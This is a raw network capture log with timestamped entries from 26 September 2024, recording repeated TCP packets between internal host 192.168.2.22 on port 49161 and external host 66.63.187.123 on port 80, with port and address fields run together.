                                              Sep 26, 2024 09:19:22.704946995 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.704955101 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.704986095 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.705001116 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.705035925 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:22.705506086 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:22.705558062 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.051680088 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.051769972 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.051809072 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.051846027 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.051881075 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.051897049 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.051897049 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.051897049 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.051897049 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.051915884 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.051934958 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.051953077 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.051961899 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.051986933 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.051995993 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052026033 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052031994 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052069902 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052150965 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052194118 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052208900 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052248955 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052252054 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052284956 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052294970 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052320957 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052326918 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052354097 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052361965 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052397966 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052423000 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052457094 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052465916 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052493095 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052508116 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052531958 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052637100 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052676916 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.052681923 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052726030 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.052970886 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053016901 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053029060 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053064108 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053072929 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053097963 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053108931 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053132057 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053132057 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053167105 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053174973 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053201914 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053210974 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053236961 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053245068 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053273916 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053278923 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053318024 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053709030 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053744078 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053752899 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053780079 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053798914 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053814888 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053821087 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053858042 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053872108 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053904057 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053913116 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053950071 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.053961039 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.053993940 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054003954 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054029942 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054063082 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054039001 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054075003 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054107904 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054116011 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054161072 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054168940 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054203033 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054212093 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054236889 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054245949 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054270983 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054279089 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054306030 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054312944 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054341078 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054348946 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054378986 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054383993 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054421902 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054905891 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054944038 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054968119 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.054980993 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.054982901 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055020094 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055167913 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055214882 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055222034 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055257082 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055263042 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055291891 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055301905 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055326939 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055336952 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055361986 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055372000 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055412054 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055419922 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055438995 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055454969 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055463076 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055490017 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055500984 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055525064 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055535078 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055562973 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.055581093 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.055608034 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056119919 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056171894 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056174994 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056210995 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056216002 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056243896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056252003 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056287050 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056298971 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056333065 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056343079 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056368113 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056371927 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056400061 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056401968 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056433916 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056440115 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056468964 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056498051 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056502104 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056513071 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056538105 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056540012 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056577921 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056824923 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056858063 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056871891 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056895971 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056900024 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056956053 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.056963921 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.056999922 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057018042 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057034016 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057048082 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057069063 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057075977 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057102919 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057106018 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057137012 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057142019 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057172060 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057185888 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057205915 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057214975 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057241917 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057246923 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057286024 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057548046 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057598114 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057605982 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057641029 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057641983 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057687044 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057696104 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057734013 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057744026 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057769060 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057776928 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057802916 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057809114 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057842970 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057857990 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057890892 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057904005 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057929039 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057933092 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.057961941 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.057969093 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.058000088 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.058003902 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.058038950 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.058748007 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.058798075 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.058801889 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.058842897 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.058845043 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.058892012 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.058898926 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.058937073 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.058947086 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.058971882 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.058979034 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059009075 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059010983 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059055090 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059061050 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059098005 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059108019 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059130907 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059135914 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059166908 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059176922 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059200048 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059232950 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059242964 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059251070 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059281111 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059283972 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059318066 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059329033 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059351921 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059355974 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059402943 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059767008 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059782982 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059799910 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059812069 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059828997 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059837103 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059868097 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059885025 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059900999 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059910059 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059919119 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.059925079 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059942007 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.059957981 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060012102 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060026884 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060044050 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060055971 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060060978 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060070992 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060081005 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060096025 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060101986 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060133934 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060669899 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060687065 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060704947 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060718060 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060745001 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060745001 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060784101 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060801029 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060817003 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060827971 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060836077 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060841084 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060854912 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060870886 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060930014 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060945988 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060961962 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060971975 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.060977936 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.060986042 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061000109 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061002016 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061013937 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061037064 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061589956 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061605930 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061623096 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061635971 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061664104 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061664104 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061700106 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061717987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061733961 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061742067 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061752081 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061759949 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061773062 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061786890 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061814070 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061830044 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061846972 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.061856031 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061870098 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.061882019 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062403917 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062449932 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062455893 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062488079 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062530041 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062572956 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062582970 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062599897 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062621117 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062634945 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062634945 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062675953 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062691927 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062707901 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062736034 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062748909 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062783957 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062824011 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062833071 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062874079 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062911987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062930107 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062957048 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062964916 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.062968969 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.062987089 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063000917 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063021898 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063085079 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063128948 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063162088 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063180923 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063204050 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063218117 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063236952 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063273907 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063332081 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063349962 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063366890 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 09:19:23.063410044 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063410044 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 09:19:23.063410044 CEST4916180192.168.2.2266.63.187.123
